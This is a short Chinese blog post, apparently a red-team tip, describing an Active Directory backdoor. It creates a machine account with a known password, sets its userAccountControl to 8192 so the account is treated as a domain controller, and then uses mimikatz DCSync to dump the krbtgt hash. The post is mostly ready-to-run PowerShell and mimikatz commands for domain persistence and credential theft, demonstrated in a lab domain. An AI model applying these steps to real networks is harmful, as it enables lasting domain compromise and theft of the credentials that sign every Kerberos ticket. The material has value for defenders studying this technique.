userAccountControl将ID设置为8192作为后门

  1. 前言
  2. 环境

前言

来源推特:

环境

YAYI.local - Windows Server 2012 - DC
YAYI.local - Windows 7 - 域机器(WIN-BMIO66D4K15)

在域控机器执行

powershell下运行
如果要在非DC下执行需要执行命令:Import-Module Microsoft.ActiveDirectory.Management.dll #导入Microsoft.ActiveDirectory.Management.dll

#添加机器账户
New-ADComputer -Name ATTACKER10 -AccountPassword (ConvertTo-SecureString -String "Hjk123456!" -Force -AsPlainText)

#设置机器账户的userAccountControl (需要域管权限)
$ADComputer=Get-ADComputer -Identity ATTACKER10
Set-ADObject -Identity $ADComputer -Replace @{userAccountControl=8192}

#查询域DC机器
Get-ADGroupMember -Identity "Domain Controllers"

域内机器执行dcsync dump

(需要等待几分钟)
mimikatz:
lsadump::dcsync /user:krbtgt



转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:userAccountControl将ID设置为8192作为后门

本文作者:九世

发布时间:2022-01-16, 01:02:29

最后更新:2022-01-16, 01:25:17

原始链接:http://422926799.github.io/posts/a984f0cd.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录